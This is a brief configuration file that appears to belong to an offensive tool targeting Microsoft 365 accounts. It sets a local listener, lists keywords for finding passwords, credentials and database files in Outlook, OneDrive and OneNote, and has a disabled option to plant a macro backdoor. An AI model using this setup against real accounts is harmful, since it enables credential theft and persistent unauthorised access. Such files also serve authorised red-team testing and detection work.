[server]
host = 127.0.0.1
externalport = 30662
certificate = server.crt
key = server.key
internalport = 8080

[keywords]
outlook = pass,vpn,creds,credentials,new
onedrive = password,.config,.xml,db,database,mbd
onenote = pass,user

[backdoor]
enabled = false
macro = "C:\\Test.bas"
